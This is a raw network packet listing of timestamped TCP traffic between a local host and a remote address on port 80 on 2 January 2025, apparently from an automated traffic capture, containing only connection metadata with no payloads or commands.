                                                                            Jan 2, 2025 20:34:53.174999952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175010920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175017118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.175021887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175033092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175035954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.175045013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175054073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.175079107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.175101995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.175220966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175231934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175241947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175251961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175261974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175265074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.175271988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175282955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.175287008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.175302982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.175326109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.177860975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.177882910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.177894115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.177902937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.177908897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.177915096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.177917957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.177926064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.177937984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.177963018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.177982092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.179902077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.179966927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.179971933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.179980040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.179991007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.180001974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.180007935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.180012941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.180023909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.180030107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.180036068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.180066109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.180085897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.183485985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183499098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183516979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183533907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.183533907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183545113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183556080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183563948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.183569908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183579922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183590889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183602095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.183604956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.183623075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.183649063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.188452005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188467979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188487053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188497066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188507080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188510895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.188519001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188529968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188539982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188549995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188554049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.188563108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188581944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.188606024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.188621998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188632965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188643932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188653946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188657045 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.188666105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.188692093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.188714027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.189706087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.189721107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.189734936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.189754009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.189763069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.189764023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.189775944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.189786911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.189793110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.189835072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.190838099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190849066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190866947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190877914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190887928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.190887928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190900087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190910101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.190911055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190922976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190932035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.190947056 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.190972090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261018991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261037111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261049986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261112928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261122942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261133909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261142015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261152029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261162043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261168003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261173010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261190891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261202097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261213064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261218071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261224031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261253119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261269093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261279106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261288881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261298895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261307001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261316061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261327028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261328936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261339903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261349916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261359930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261375904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261385918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261394024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261404991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261415005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261415958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261423111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261430979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261442900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261455059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261456013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261482000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261499882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261657000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261667967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261677980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261687994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261698961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261701107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261708021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261718988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261727095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261738062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261748075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261759043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261768103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261779070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261784077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261784077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261789083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261792898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261801004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261810064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261814117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261821032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261833906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261837959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261850119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261852026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261873960 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261912107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261928082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261938095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261950016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261965036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261976004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.261979103 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261991024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.261992931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262003899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262015104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262021065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.262051105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.262113094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262124062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262134075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262156963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.262183905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.262191057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262269974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262280941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262290955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262306929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.262309074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262320042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262330055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262341022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262341976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.262351036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.262363911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.262387991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.264568090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.264597893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.264612913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.264617920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.264630079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.264642954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.264648914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.264650106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.264655113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.264662027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.264667034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.264688969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.264713049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.266663074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.266675949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.266695976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.266706944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.266717911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.266726971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.266729116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.266741037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.266771078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.266777039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.266786098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.266814947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.270328045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.270348072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.270359993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.270375013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.270375967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.270386934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.270396948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.270401001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.270410061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.270421028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.270437956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.270457983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.275373936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275403976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275415897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275425911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.275427103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275439978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275449991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275456905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.275473118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275484085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275490046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.275496006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275506020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275509119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.275516987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275527954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275538921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275541067 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.275551081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.275568962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.275587082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.276534081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.276546001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.276557922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.276567936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.276580095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.276582003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.276591063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.276602030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.276607037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.276612043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.276657104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.277610064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.277621984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.277642965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.277653933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.277663946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.277666092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.277700901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.277702093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.277714014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.277714968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.277726889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.277746916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.277755976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.347810984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347841024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347856998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347867012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347872019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347877979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347884893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.347888947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347930908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.347944975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347963095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347975016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.347976923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.347991943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348001957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348004103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348014116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348025084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348026991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348041058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348051071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348057032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348062038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348073006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348088980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348099947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348109961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348109961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348109961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348112106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348135948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348151922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348161936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348171949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348176956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348217964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348222017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348222017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348247051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348258972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348299980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348310947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348320961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348330975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348341942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348368883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348396063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348411083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348422050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348432064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348442078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348457098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:53.348459005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:53.348475933 CET4973080192.168.2.447.254.187.72
